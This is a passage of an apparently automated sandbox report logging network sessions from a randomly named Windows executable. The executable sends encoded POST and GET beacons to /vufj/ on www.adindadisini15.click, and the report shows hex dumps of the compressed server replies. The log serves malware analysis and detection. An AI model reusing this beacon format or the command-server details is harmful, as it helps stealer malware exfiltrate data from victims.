                                        Data Ascii: dkMMfSwR\9sJ^u#}6XS*Xq5zueKpU36,zxg6=ry[$<dY4iY&3x6>bO+(ridbLx)bj\K*KJ/!,>?P}MYnc
                                        Aug 27, 2024 08:43:30.551286936 CEST1236INData Raw: 89 bf 06 5f 93 b5 e1 a1 60 3d 72 7e ad c8 c8 b8 2f 39 0c ac ef 60 70 18 fb d1 3a 60 59 ff 63 d6 0f c2 4c f4 6f 59 1c 24 1c 78 bf 4d b9 b5 0a 63 eb 63 f6 97 5b c6 a7 8e 35 b1 5c ed e6 ba 9f f9 fc 9c 7c 49 ce c3 54 dc 9c 13 fd 0a 5e 0c c6 86 dd 9c
                                        Data Ascii: _`=r~/9`p:`YcLoY$xMcc[5\|IT^*T>e&0w}|K`6]c[Rm=S+$XGL#O&_*Gm"'T7?f"D}Z23]u?kOlxIaN5z'33J|
                                        Aug 27, 2024 08:43:30.556143999 CEST1236INData Raw: 97 8c ab 51 d4 29 24 b0 70 53 4a c8 19 7f e4 d4 ee 10 14 87 cd f8 94 8a 25 09 a6 da 0f ce 80 38 8e 35 89 c6 96 63 8e ad 81 e9 98 f0 af 43 c6 96 0b ff 9a f0 af 43 e0 1b fe 0e cc b1 35 22 63 eb 82 c8 b4 91 39 b6 c6 44 a6 8d 89 63 3a bf 83 1b 04 80
                                        Data Ascii: Q)$pSJ%85cCC5"c9Dc:i5UU['!$|UHus(\-_6)]0"4pmQF^ab-3M\o*2WMQ^T=(lsetdvOt7u$iB#kP


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.651223172.96.186.147805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:32.443896055 CEST879OUTPOST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 7a 46 72 5a 44 45 73 4d 44 6a 6c 63 35 68 71 75 59 33 44 68 6c 61 4a 74 74 59 45 6e 70 61 69 47 59 4e 4a 48 41 77 50 63 73 59 4e 52 6c 4f 4c 6e 7a 68 6b 6d 76 2f 7a 48 71 5a 49 70 6b 65 4a 4c 79 2f 72 55 4b 52 2b 62 73 6b 47 54 71 65 32 36 53 35 77 66 75 63 6c 36 69 6b 42 51 33 79 49 64 69 68 51 59 35 43 47 75 57 50 55 4f 68 6e 72 78 4d 41 70 50 6d 54 58 58 45 6e 71 59 6c 54 62 55 43 42 71 7a 6d 38 2b 42 69 58 35 2b 78 7a 73 76 55 72 77 72 54 69 67 58 30 70 50 51 31 68 62 70 33 46 48 65 37 35 62 62 2b 77 64 36 6d 75 47 64 6b 6c 78 35 33 57 31 4f 61 47 50 74 50 35 6d 72 56 6e 46 4f 79 34 77 79 59 32 5a 68 30 59 55 31 44 63 4c 4e 71 39 70 6f 73 30 53 7a 55 4f 72 42 34 77 3d 3d
                                        Data Ascii: mvjDMBx8=zFrZDEsMDjlc5hquY3DhlaJttYEnpaiGYNJHAwPcsYNRlOLnzhkmv/zHqZIpkeJLy/rUKR+bskGTqe26S5wfucl6ikBQ3yIdihQY5CGuWPUOhnrxMApPmTXXEnqYlTbUCBqzm8+BiX5+xzsvUrwrTigX0pPQ1hbp3FHe75bb+wd6muGdklx53W1OaGPtP5mrVnFOy4wyY2Zh0YU1DcLNq9pos0SzUOrB4w==
                                        Aug 27, 2024 08:43:33.118436098 CEST1236INHTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        transfer-encoding: chunked
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:33 GMT
                                        server: LiteSpeed
                                        Data Raw: 33 33 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 77 db 36 b2 e8 cf f6 5f 81 d0 a7 b1 98 92 14 49 7d 58 a6 2d ef 6d 93 f6 6e df 6b 6f 7b 9a 76 ef bb af c9 c9 81 48 48 62 42 91 5c 10 b2 ec 7a fd bf bf 33 03 f0 53 a4 24 cb e9 f6 de 3d af 69 1c 13 1f 33 83 01 30 98 19 0c 80 eb 17 6f 7e 7c fd cb 7f fd f4 0d 59 8a 55 74 73 7a 0d ff 90 88 c6 8b a9 c6 62 f3 d7 b7 1a a4 31 1a dc 9c 9e 5c af 98 a0 c4 5f 52 9e 31 31 d5 7e fd e5 5b 73 a2 91 7e 91 13 d3 15 9b 6a b7 21 db a4 09 17 1a f1 93 58 b0 58 4c b5 4d 18 88 e5 34 60 b7 a1 cf 4c fc 30 48 18 87 22 a4 91 99 f9 34 62 53 07 e1 48 04 08 e6 9c 27 b3 44 64 e7 05 90 f3 15 bd 33 c3 15 5d 30 33 e5 0c 90 78 11 e5 0b 76 0e 04 5c 8b 50 44 ec e6 27 ba 60 24 4e 04 99 27 eb 38 20 2f cf 26 ae e3 5c 11 1a 84 71 40 83 30 0b e3 d0 19 59 7e 14 fa 9f ae fb b2 ca e9 75 14 c6 9f 08 67 d1 f4 3c 88 33 80 3d 67 c2 5f 9e 93 25 67 f3 e9 79 bf df 56 5b 22 2d 6a 6a 34 12 8c c7 54 30 8d 88 fb 94 4d 35 9a a6 51 e8 53 11 26 71 9f 67 d9 97 77 ab 48 23 88 71 aa b5 01 24 2f 39 fd fb 3a [TRUNCATED]
                                        Data Ascii: 33ba}w6_I}X-mnko{vHHbB\z3S$=i30o~|YUtszb1\_R11~[s~j!XXLM4`L0H"4bSH'Dd3]03xv\PD'`$N'8 /&\q@0Y~ug<3=g_%gyV["-jj4T0M5QS&qgwH#q$/9:"2h"vsAdb'W5e>Sqs X6)[%L0^ddJ<<wwX_cg~>V~wFm/]_34v'4OxZv8^v@h0EL4?}*E&5?fUM"F3f[xu32#FHU|0zv1OLuscW,tzm*nh~eYoEY%zXa=>=>3,?b|`O[YRK.B75v'z[)Pk
                                        Aug 27, 2024 08:43:33.118458033 CEST1236INData Raw: df 81 34 78 43 05 3d 04 b4 15 50 41 75 83 4f 7b cf a0 29 46 9a 8c cf 45 8d 7e c5 99 58 f3 98 08 8b dd 32 7e df cb 19 08 ec d3 1f 54 26 9b 4e a7 fc 37 f1 fe 51 2f 19 bc ce 19 9c 6d 42 60 bf d0 1f 7c 9a 31 6d 1e d1 85 e6 a9 8a 71 8f 19 da bb 75 30
                                        Data Ascii: 4xC=PAuO{)FE~X2~T&N7Q/mB`|1mqu0|>x3{nvnL:jpu(\/_6@w`6|Q>*W_B_Hq@b^fR.)sM.PAAcEV?*NaR6c
                                        Aug 27, 2024 08:43:33.118477106 CEST1236INData Raw: 4a 93 83 27 80 05 7a 83 ba cb cb cb cb f4 ee 11 ba 1e 7a fc e6 b4 b3 e7 d1 68 af 77 fd 2e ec 58 9c 50 fd c1 4f a2 84 17 5c d8 8d 68 c1 93 35 18 8b ad c3 0b 33 db 87 d6 e3 16 07 b0 70 c9 10 05 38 33 23 7a 9f ac 85 e9 27 71 26 38 05 95 51 7f 48 93
                                        Data Ascii: J'zzhw.XPO\h53p83#z'q&8QH,#,"e{%3EiLo<HIBQ{[e-=,+bC+S80k<bwWB&](cig%4~qp~LVgURe+*9]vO9-uUKR8,(~
                                        Aug 27, 2024 08:43:33.118489981 CEST1236INData Raw: da 92 cb 21 fc 91 b6 e5 82 27 1b cf 51 f3 59 8a 59 3b ff 92 f2 d8 ae 70 1d 75 91 9c 09 93 f4 4e ce f8 80 f9 09 47 e3 d8 5b c7 19 13 2f c2 15 ec c8 d2 b8 e6 22 41 22 4b e3 b9 ce 70 5c a7 2a 86 63 3d f7 01 d9 95 2d 79 18 7f f2 0a f2 50 24 c0 57 97
                                        Data Ascii: !'QYY;puNG[/"A"Kp\*c=-yP$Wc<&K)XO#$mwHxjKFldVl)OR>z;U|Zu5mw!Sme05X\*P\Vsg#x[+}dWp>-`~5
                                        Aug 27, 2024 08:43:33.118503094 CEST1236INData Raw: 24 16 9c de 57 62 1b e4 08 db 8e ed 38 63 8c 6d 41 80 21 64 1e 0a 60 e0 c0 9f 2d 18 15 2a 90 fb ca fd be 07 5f ad 68 0b e4 f0 36 0c cc 05 84 89 9b fe 3d 8d 4d 91 98 b7 98 86 5f b3 68 cd 80 ee 20 64 b1 a8 34 be d2 6c 0f 8c 5e ca 8b 52 3d 67 30 0a
                                        Data Ascii: $Wb8cmA!d`-*_h6=M_h d4l^R=g083{|9`t>_geClx:_gtsVCSqf~vkP7h628_SOE}WGzcHG51kX;}0/l?_?n8s'
                                        Aug 27, 2024 08:43:33.118516922 CEST1236INData Raw: 95 b8 87 11 75 52 24 ca 92 1b 28 94 76 e3 af a0 52 dd e0 da 17 c6 70 6c 0c c7 fb f8 d0 74 0e 89 44 fa 50 66 d1 ba 14 c3 dd d8 7b ee 60 62 a8 bf 45 27 38 e3 4b c3 99 0c 0d e7 72 b4 0f bd 9f 24 11 34 75 43 f9 ca c4 15 93 af 57 1e d9 81 f0 62 68 b8
                                        Data Ascii: uR$(vRpltDPf{`bE'8Kr$4uCWbh!t|o]Ny`brx4lN&Epb/fP?epTp.i`VbCvxT`tt5t/:p8n\%L`CU3;
                                        Aug 27, 2024 08:43:33.118530035 CEST1236INData Raw: 28 f3 91 a4 28 94 69 f9 d4 c6 40 3f b8 66 4a 4e 63 e8 fc 57 e5 e0 c5 44 08 56 86 f0 77 07 f5 b6 02 83 cc 63 71 e0 11 e8 d6 7c d3 13 02 07 eb f0 d4 31 67 1f 2e 35 ec 00 bd 07 40 04 d7 25 b4 d6 2f d1 63 24 54 43 06 4a 12 17 14 96 07 45 bc 3a ab 8d
                                        Data Ascii: ((i@?fJNcWDVwcq|1g.5@%/c$TCJE:Wh'T,n\*ZIV"z:g81rd7k?Fg5!COM\0Luh^DPedcU58MrrB ~)S4rl*Z]gI6$
                                        Aug 27, 2024 08:43:33.118545055 CEST1236INData Raw: ee b5 f6 39 d0 f3 d5 bc 85 f7 79 96 e9 3e ab 93 4b 30 bb 70 0c 3e 0f 8e 1d 5a c4 73 b8 24 d7 df 16 fa d5 c2 fc 3c 0e e5 40 ba e1 3f 8f 3b 0a fe 0e de 0c 9f c5 7d 05 7f a7 76 f2 7c ee 9b 3b 74 16 f9 26 95 d4 13 0f f4 78 1d ae ab 1c 01 fc 70 1d e5
                                        Data Ascii: 9y>K0p>Zs$<@?;}v|;t&xp&G@=P'9OEPOeF5)=uqUuvA~'bD^pN,nq4GKqq|eom3 y<;ch`/(jp[8bD(ztL/
                                        Aug 27, 2024 08:43:33.118556976 CEST1236INData Raw: 5f de f6 7f 2e db ba b8 f6 87 28 a2 1d 72 33 63 29 e5 54 24 bc 7b d2 16 45 64 ff 14 a3 1c 0e 51 ab 41 5a a4 05 89 c8 aa a7 c4 2b 65 70 fc aa 53 e3 6a dc 6e af 91 c5 f9 da b1 ad b7 5f 42 ee 27 5c 5d c8 61 66 eb 14 de ea 6e bc d1 05 63 05 16 77 1a
                                        Data Ascii: _.(r3c)T${EdQAZ+epSjn_B'\]afncwX|ujW8pG~d}7|xI"m;z+Zm!/tirvPV'0Cc!vu}r1z!/Bx$LbOWj`o[|9bo!X/
                                        Aug 27, 2024 08:43:33.118571997 CEST1236INData Raw: 50 38 08 6f f3 b2 f5 1b 5c b5 9b 6b 00 c8 78 25 5b 4a b9 42 33 4d 29 17 da 4d 13 86 2c 84 8a 3d 41 6d 1d fc 64 04 5c bd 78 67 42 19 57 2d 4f 33 ab 9c 5c 35 c3 cf c6 0d cf a5 73 ab 7a 77 64 a1 29 37 6d 88 4a 21 ed f4 04 d9 33 d5 72 2f 28 28 46 78
                                        Data Ascii: P8o\kx%[JB3M)M,=Amd\xgBW-O3\5szwd)7mJ!3r/((Fxv6 M9=9=i9aV\-}JJ1kRRt_vTex@.<E9Xgd=9NF`\TRLLRon4>~o#Z?D,]#cYjd
                                        Aug 27, 2024 08:43:33.123440027 CEST1236INData Raw: c9 5a 64 60 38 17 53 22 cf 47 a7 bf d2 2c 1b 99 1a 21 84 dc 5c e3 7a b1 c5 e1 bc be cc cd 7c 0e 4f 33 73 34 f1 4d 80 09 ca 16 47 ff b7 34 06 f3 f2 18 52 68 ba 1a b9 79 8b ad bd ee 23 84 9b 56 3b b9 ac 04 c4 e3 de 4d ca 38 d1 c8 cd 35 c2 e9 a4 4a
                                        Data Ascii: Zd`8S"G,!\z|O3s4MG4Rhy#V;M85JJ#-D>d2N/y-@!g(U\-z>Uxl)uF>m$.SG_! v]PmVI{r&mg*5]8$dv


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.651224172.96.186.147805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:34.988114119 CEST1892OUTPOST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 7a 46 72 5a 44 45 73 4d 44 6a 6c 63 35 68 71 75 59 33 44 68 6c 61 4a 74 74 59 45 6e 70 61 69 47 59 4e 4a 48 41 77 50 63 73 59 46 52 6c 5a 4c 6e 38 6d 59 6d 75 2f 7a 48 31 70 49 73 6b 65 4a 57 79 2f 54 51 4b 51 43 68 73 69 4b 54 77 38 53 36 46 63 51 66 6e 63 6c 36 74 45 42 52 71 69 49 45 69 68 41 55 35 43 57 75 57 50 55 4f 68 6d 62 78 46 79 52 50 6b 54 58 55 44 6e 71 4d 68 54 62 77 43 46 48 45 6d 38 36 2f 69 6b 78 2b 78 54 63 76 59 34 49 72 4c 79 67 56 35 4a 50 79 31 68 57 7a 33 46 62 6a 37 36 48 31 2b 33 31 36 6e 61 6e 32 39 30 52 55 30 55 56 43 4f 33 36 49 41 73 4f 4b 61 47 49 32 30 4a 63 45 47 79 4e 7a 36 2f 34 4b 42 50 4f 5a 72 66 5a 6f 71 54 79 67 53 4f 4b 4a 36 51 63 36 4b 34 6d 41 59 63 53 72 61 2f 55 73 68 64 46 43 47 74 49 67 37 63 70 6a 34 50 4a 7a 63 44 6f 6a 4a 50 68 73 42 48 55 68 74 73 30 55 61 52 36 4d 4c 72 46 57 51 63 52 55 41 6c 57 2f 4e 6a 77 49 44 54 6c 6b 39 47 69 38 75 52 45 33 64 37 57 6a 42 38 46 57 37 35 6c 2f 6d 66 50 32 5a 72 4a 56 72 6f 30 47 46 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=zFrZDEsMDjlc5hquY3DhlaJttYEnpaiGYNJHAwPcsYFRlZLn8mYmu/zH1pIskeJWy/TQKQChsiKTw8S6FcQfncl6tEBRqiIEihAU5CWuWPUOhmbxFyRPkTXUDnqMhTbwCFHEm86/ikx+xTcvY4IrLygV5JPy1hWz3Fbj76H1+316nan290RU0UVCO36IAsOKaGI20JcEGyNz6/4KBPOZrfZoqTygSOKJ6Qc6K4mAYcSra/UshdFCGtIg7cpj4PJzcDojJPhsBHUhts0UaR6MLrFWQcRUAlW/NjwIDTlk9Gi8uRE3d7WjB8FW75l/mfP2ZrJVro0GF5pUGGMixJMvDkLPlZKjauFbnf9kRUupZ12zjbbUpu2pfrmqrr12FcV50uXReLaai8bbwBAoFwpy/pVYPEA12n2pz9x8WZdYMyspA29yD4017383QJw1dC1J2Fv8GL/UBgT2MgIHSNWT0SWaRf98tiat0udf2XdU/THHBDGFn83+tW5YTmozRhRDutU5zrgnA7zgKb3OxtFqrsVycW7hH0Pd1v8vStYG46oqeoDYKUVQUY6ij7UUFa77VZlCT1CbW6qy3ThENt34q2k+4JAh/g5Cq88m1kO5onppzYk/3h+UZZ7/ZW8bZkZjFElmCVi2Gvm0JTmW7xfiaMc1y8z/Xp182ilPHPpGWW18Wr/bgyU4qPD0GgMeFnEE2OuuzzG1Q5lkFZdJF4asus6NgLmXCCs+/vve0tgK5e7A9Qz69n9g2HU0xLTqvijD0VtY1fcD1f3VMNatGhM3KQ+1j6Str5fwc44Qs/bdG4OprtVTjtFDe2U8/8+/r05e9UT4ZwymrfZgWdXt5J/NJg0m4P4i7gMgDJOuJzt2Lf3pDOBEghOGA12vvKl1IwNSTEg43LvKbqk9ZEWlkxvWIfcs9QfMem+Civ8DSah15/zaQTImfftY4BZZfY04zbGOWiI8lR1Sy5OQQsmZdiv9+E7ZbfBQwRVIQmhYopCFPTZ [TRUNCATED]
                                        Aug 27, 2024 08:43:35.762628078 CEST1236INHTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        content-length: 13246
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:35 GMT
                                        server: LiteSpeed
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d fd 77 db 36 b2 e8 cf f6 5f 81 d0 a7 b1 98 92 14 49 7d 58 a6 2d ef 6d 93 f6 6e df 6b 6f 7b 9a 76 ef bb af c9 c9 81 48 48 62 42 91 5c 10 b2 ec 7a fd bf bf 33 03 f0 53 a4 24 cb e9 f6 de 3d af 69 1c 13 1f 33 83 01 30 98 19 0c 80 eb 17 6f 7e 7c fd cb 7f fd f4 0d 59 8a 55 74 73 7a 0d ff 90 88 c6 8b a9 c6 62 f3 d7 b7 1a a4 31 1a dc 9c 9e 5c af 98 a0 c4 5f 52 9e 31 31 d5 7e fd e5 5b 73 a2 91 7e 91 13 d3 15 9b 6a b7 21 db a4 09 17 1a f1 93 58 b0 58 4c b5 4d 18 88 e5 34 60 b7 a1 cf 4c fc 30 48 18 87 22 a4 91 99 f9 34 62 53 07 e1 48 04 08 e6 9c 27 b3 44 64 e7 05 90 f3 15 bd 33 c3 15 5d 30 33 e5 0c 90 78 11 e5 0b 76 0e 04 5c 8b 50 44 ec e6 27 ba 60 24 4e 04 99 27 eb 38 20 2f cf 26 ae e3 5c 11 1a 84 71 40 83 30 0b e3 d0 19 59 7e 14 fa 9f ae fb b2 ca e9 75 14 c6 9f 08 67 d1 f4 3c 88 33 80 3d 67 c2 5f 9e 93 25 67 f3 e9 79 bf df 56 5b 22 2d 6a 6a 34 12 8c c7 54 30 8d 88 fb 94 4d 35 9a a6 51 e8 53 11 26 71 9f 67 d9 97 77 ab 48 23 88 71 aa b5 01 24 2f 39 fd fb 3a b9 22 df 32 16 68 [TRUNCATED]
                                        Data Ascii: }w6_I}X-mnko{vHHbB\z3S$=i30o~|YUtszb1\_R11~[s~j!XXLM4`L0H"4bSH'Dd3]03xv\PD'`$N'8 /&\q@0Y~ug<3=g_%gyV["-jj4T0M5QS&qgwH#q$/9:"2h"vsAdb'W5e>Sqs X6)[%L0^ddJ<<wwX_cg~>V~wFm/]_34v'4OxZv8^v@h0EL4?}*E&5?fUM"F3f[xu32#FHU|0zv1OLuscW,tzm*nh~eYoEY%zXa=>=>3,?b|`O[YRK.B75v'z[)Pk4xC=P
                                        Aug 27, 2024 08:43:35.762651920 CEST1236INData Raw: 41 75 83 4f 7b cf a0 29 46 9a 8c cf 45 8d 7e c5 99 58 f3 98 08 8b dd 32 7e df cb 19 08 ec d3 1f 54 26 9b 4e a7 fc 37 f1 fe 51 2f 19 bc ce 19 9c 6d 42 60 bf d0 1f 7c 9a 31 6d 1e d1 85 e6 a9 8a 71 8f 19 da bb 75 30 19 f8 ef d6 c1 7c 3e 78 b7 9e 33
                                        Data Ascii: AuO{)FE~X2~T&N7Q/mB`|1mqu0|>x3{nvnL:jpu(\/_6@w`6|Q>*W_B_Hq@b^fR.)sM.PAAcEV?*NaR6ch/$s
                                        Aug 27, 2024 08:43:35.762665033 CEST448INData Raw: cb cb f4 ee 11 ba 1e 7a fc e6 b4 b3 e7 d1 68 af 77 fd 2e ec 58 9c 50 fd c1 4f a2 84 17 5c d8 8d 68 c1 93 35 18 8b ad c3 0b 33 db 87 d6 e3 16 07 b0 70 c9 10 05 38 33 23 7a 9f ac 85 e9 27 71 26 38 05 95 51 7f 48 93 2c 04 23 d2 e3 2c a2 22 bc 65 7b
                                        Data Ascii: zhw.XPO\h53p83#z'q&8QH,#,"e{%3EiLo<HIBQ{[e-=,+bC+S80k<bwWB&](cig%4~qp~LVgURe+*9]vO9-uUKR8,(~DNtYYgq
                                        Aug 27, 2024 08:43:35.762676954 CEST1236INData Raw: 2b 95 a6 94 1d 32 28 93 4a 79 e2 11 b9 cc 6c 52 13 fc fa 19 13 a6 5c 46 e0 9f 58 70 9a 09 d3 35 88 bf e6 9c c5 e2 35 2c d8 ba 82 eb 47 61 6a a6 54 2c 3d 02 3f 7b e7 3f 38 8e 75 39 b0 c6 93 e1 ed c4 b2 07 97 d1 c8 1a 0f 06 26 fe 24 8e e5 3a 63 f8
                                        Data Ascii: +2(JylR\FXp55,GajT,=?{?8u9&$:cc2u13hd]&_]sd]/_@?Wk2tvi]NXv SDt,4`8y|-%RDf^"FH8o%f$N}P:aTU8\
                                        Aug 27, 2024 08:43:35.762691021 CEST1236INData Raw: e4 99 a0 ef 95 0c a8 f8 b5 77 81 0b 98 dc 76 0a 93 b8 d0 80 40 19 79 b4 90 d4 75 68 8a 24 89 b2 5c 10 8a 24 ad ea 27 73 1b fe 14 63 17 fb 32 af 27 37 ae c2 38 63 1c 8c 9a 5c 76 01 84 1d e5 3e 7c 00 a5 bf a6 cc 16 da 4b 9b bd b2 e5 c8 e1 3c d9 20
                                        Data Ascii: wv@yuh$\$'sc2'78c\v>|K< w`|sM`rUerr+JVaD?AyWH8)7iI^Y-L]beh9MxE^~uW.`7I tJeS$i1;pj
                                        Aug 27, 2024 08:43:35.762703896 CEST1236INData Raw: 0a d6 33 e1 f7 5c e7 57 bb b3 85 8b c7 be 2a 22 36 e9 0c 17 48 96 07 f8 e6 5b 8e ca 18 83 dd e9 52 c3 6a 23 5a 39 21 4b c5 2b d7 80 82 20 90 ed 80 58 dc 12 46 a5 01 e8 44 91 0b fa d9 70 38 2c 42 31 71 51 af f8 b1 1d b6 ca 5b 88 71 bd b8 13 35 4a
                                        Data Ascii: 3\W*"6H[Rj#Z9!K+ XFDp8,B1qQ[q5JrvMtFqq;8>+D^,#5RsndPeFn*JB 4}Q6f}x i4AaJv`}duk5Fc8qvr.\-~#eNr
                                        Aug 27, 2024 08:43:35.762715101 CEST1236INData Raw: d9 34 33 38 10 03 51 4d 97 70 82 ad de cd 95 62 10 f3 03 ab b5 63 d9 18 fd d4 59 10 dd d9 1e f1 23 ba 4a 7b 8e 35 00 b0 06 51 bf 90 2f 49 af e7 dc 6e 88 09 61 54 9c ad 74 f2 8a d8 d6 c5 f8 42 87 32 13 00 dd d4 22 2b 44 dc 49 67 79 09 1d 2b 14 35
                                        Data Ascii: 438QMpbcY#J{5Q/InaTtB2"+DIgy+5[;=q.B^{E5M8\;833+SkyMyN^2[%Xp 3eAK~ !'1+>E:4ENY i,(gQd_gX&&BC
                                        Aug 27, 2024 08:43:35.762727022 CEST1236INData Raw: 9b d4 ac 87 51 eb f9 ad 86 2d 0c cd e3 0a d4 bd 4a fa 56 ec 16 81 7b 18 39 ec 36 e5 b6 92 42 b6 17 a9 b7 84 88 38 5d 06 27 56 a2 c1 e4 71 be c7 a5 63 90 a5 6b 90 e5 c0 20 cb a1 41 96 23 83 2c c7 2a dc f9 10 4a 2b 63 a7 6d 28 56 b2 4d 53 79 84 d4
                                        Data Ascii: Q-JV{96B8]'Vqck A#,*J+cm(VMSyhQG{t*- `9K!C]=.H~\]PeX{c.>Wq9svsq9>zL["B>|)Uk|TP0T}PH~`c"Sy
                                        Aug 27, 2024 08:43:35.762741089 CEST1236INData Raw: 0f 8e cb 5d 38 1c fb f3 20 71 ec 9d 58 3e d7 54 77 76 62 f9 4c 93 1d ee 89 a8 dc 2f 28 63 45 30 b6 af f5 82 cc 96 30 ae ad 18 b7 6d 78 32 be f0 08 80 2a 30 71 1b a2 7c 81 b0 40 7d 70 d4 a2 0c b2 dc 86 a7 02 3f 8f 20 31 0f 19 6d 81 f9 0c a0 dd 50
                                        Data Ascii: ]8 qX>TwvbL/(cE00mx2*0q|@}p? 1mP!G)~dM=l9?\>qg# u[xRBzT*H`<wUb|}jT^gI|2~XX!$Evc5m0vQ2+oHC
                                        Aug 27, 2024 08:43:35.762753963 CEST776INData Raw: 84 f7 c0 77 72 41 7a 84 14 2f a8 ff 09 c6 5b 9c 3f 31 49 e0 65 c2 0a 63 9a 77 32 01 09 c0 32 c5 92 e2 29 6f e9 04 21 f8 14 15 94 29 9e 46 c5 75 10 01 16 bb 35 1e 3c a9 83 49 39 0b f1 1e 36 a8 86 0a 39 81 77 a5 f0 2b 8c 99 99 97 51 97 c1 40 7a c1
                                        Data Ascii: wrAz/[?1Iecw22)o!)Fu5<I969w+Q@zCU.Hr*qhT#\YA8R4}J%gJN,CgdQoRc}oKh4~w>Uonez%1]`1C@#XLL
                                        Aug 27, 2024 08:43:35.769493103 CEST1236INData Raw: 69 50 38 08 6f f3 b2 f5 1b 5c b5 9b 6b 00 c8 78 25 5b 4a b9 42 33 4d 29 17 da 4d 13 86 2c 84 8a 3d 41 6d 1d fc 64 04 5c bd 78 67 42 19 57 2d 4f 33 ab 9c 5c 35 c3 cf c6 0d cf a5 73 ab 7a 77 64 a1 29 37 6d 88 4a 21 ed f4 04 d9 33 d5 72 2f 28 28 46
                                        Data Ascii: iP8o\kx%[JB3M)M,=Amd\xgBW-O3\5szwd)7mJ!3r/((Fxv6 M9=9=i9aV\-}JJ1kRRt_vTex@.<E9Xgd=9NF`\TRLLRon4>~o#Z?D,]#cYjd


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.651225172.96.186.147805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:37.534739017 CEST591OUTGET /vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:38.192948103 CEST549INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        content-type: text/html; charset=UTF-8
                                        x-redirect-by: WordPress
                                        location: http://adindadisini15.click/vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0
                                        x-litespeed-cache: miss
                                        content-length: 0
                                        date: Tue, 27 Aug 2024 06:43:38 GMT
                                        server: LiteSpeed


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
